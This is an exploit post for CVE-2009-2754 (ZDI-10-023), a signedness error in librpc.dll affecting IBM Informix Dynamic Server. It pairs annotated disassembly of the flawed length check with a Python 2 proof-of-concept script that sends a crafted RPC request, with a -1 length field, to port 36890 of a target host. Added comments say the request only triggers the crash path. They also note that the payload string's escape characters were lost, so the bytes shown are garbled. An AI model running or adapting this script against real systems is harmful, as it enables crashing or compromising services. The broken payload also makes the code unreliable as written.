
Multiple Vendor librpc.dll Signedness Error Remote Code Exec

Posted on 08 April 2010

=============================================================================== Multiple Vendor librpc.dll Signedness Error Remote Code Execution Vulnerability ===============================================================================
# Exploit Title: ZDI-10-023: Multiple Vendor librpc.dll Signedness Error Remote Code Execution Vulnerability
# Date: 2010-04-08
# Author: ZSploit.com
# Software Link: N/A
# Version: N/A
# Tested on: IBM Informix Dynamic Server 10.0
# CVE : CVE-2009-2754
#! /usr/bin/env python
###############################################################################
## File : zs_ids_rpc.py
## Description:
## :
## Created_On : Mar 21 2010
##
## (c) Copyright 2010, ZSploit.com. all rights reserved.
###############################################################################
"""
The issue in __lgto_svcauth_unix():

.text:1000B8E1 mov [ebp+0], eax
.text:1000B8E4 mov eax, [ebx]
.text:1000B8E6 push eax ; netlong
.text:1000B8E7 add ebx, 4
.text:1000B8EA call esi ; ntohl ; Get length of hostname
.text:1000B8EC cmp eax, 0FFh ; Signedness error, if we give 0xffffffff(-1) will pass this check
.text:1000B8F1 jle short loc_1000B8FD
.text:1000B8F3 mov esi, 1
.text:1000B8F8 jmp loc_1000B9D5
.text:1000B8FD ; ---------------------------------------------------------------------------
.text:1000B8FD
.text:1000B8FD loc_1000B8FD: ; CODE XREF: __lgto_svcauth_unix+71j
.text:1000B8FD mov edi, [ebp+4]
.text:1000B900 mov ecx, eax
.text:1000B902 mov edx, ecx
.text:1000B904 mov esi, ebx
.text:1000B906 shr ecx, 2
.text:1000B909 rep movsd ; call memcpy here with user-supplied size cause a stack overflow
.text:1000B90B mov ecx, edx
.text:1000B90D add eax, 3
.text:1000B910 and ecx, 3
.text:1000B913 rep movsb
"""
# Purpose: proof-of-concept trigger for the signed-compare bug shown in the
# disassembly above. The script opens one TCP connection to the target,
# writes a single pre-built request (120 bytes as intended) and exits. The
# request carries no shellcode -- its filler is 0x41/0x42 and zero bytes --
# so what it demonstrates is the crash path (the oversized rep movsd/movsb
# copy), not code execution.
#
# Root cause, as the disassembly documents it: the length returned by ntohl
# is compared with a *signed* `cmp eax, 0FFh` / `jle`, so 0xffffffff (-1)
# is accepted as "<= 255" and then used unchanged as the copy size.
# Detection/mitigation angle: a value above 255 in this length field is
# already refused by the check, so only a high-bit (negative when signed)
# length ever reaches the copy; a fixed build has to treat the length as
# unsigned before the copy. See the vendor references for ZDI-10-023 /
# CVE-2009-2754.
#
# NOTE(review): this is Python 2 source (print statements); it does not
# parse under Python 3.
import sys
import socket
# Exactly one positional argument: the target host. The port is fixed below.
if (len(sys.argv) != 2):
    print "Usage: %s [target]" % sys.argv[0]
    sys.exit(0)
# The crafted request.
# NOTE(review): the backslashes were lost when this copy was rendered, so the
# string literal below no longer encodes the intended bytes (each "xNN" is
# now plain ASCII); the remarks here refer to the evidently intended values.
# - Leading word 0x80000074: last-fragment bit plus a length of 0x74 = 116,
#   which matches the 116 bytes that follow it (120 total).
# - The 0xffffffff word in the third literal is the length field the
#   disassembly reads with ntohl; as -1 it passes the signed `jle` and is
#   then used as the rep movsd/movsb count.
# - The 0x41 and 0x42 runs are filler only.
data = "x80x00x00x74x00x00x00x01x00x00x00x00x00x00x00x02" "x00x01x86xb1x00x00x00x01x00x00x00x00x00x00x00x01" "x00x00x00x4cx00x00xd6x45xffxffxffxffx41x41x41x41" "x41x41x41x41x41x41x41x41x41x41x41x41x00x00x00x00" "x00x00x00x00x00x00x00x0ax42x42x42x42x42x42x42x42" "x42x42x42x42x42x42x42x42x42x42x42x42x42x42x42x42" "x42x42x42x42x42x42x42x42x42x42x42x42x42x42x42x42" "x00x00x00x00x00x00x00x00"
host = sys.argv[1]
# Hard-coded listener port of the affected service; not configurable here.
port = 36890
print "PoC for ZDI-10-023 by ZSploit.com"
try:
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        s.connect((host, port))
        # One send, no reply is read; the socket is never closed explicitly.
        s.send(data)
        print "Sending payload .."
    # Bare except: masks the real failure (refused connection, timeout, even
    # KeyboardInterrupt) behind a fixed message.
    except:
        print "Error in send"
    print "Done"
# Same bare-except pattern at the outer level (socket creation).
except:
    print "Error in socket"
The ZSploit Team http://zsploit.com # Inj3ct0r.com [2010-04-08]

 
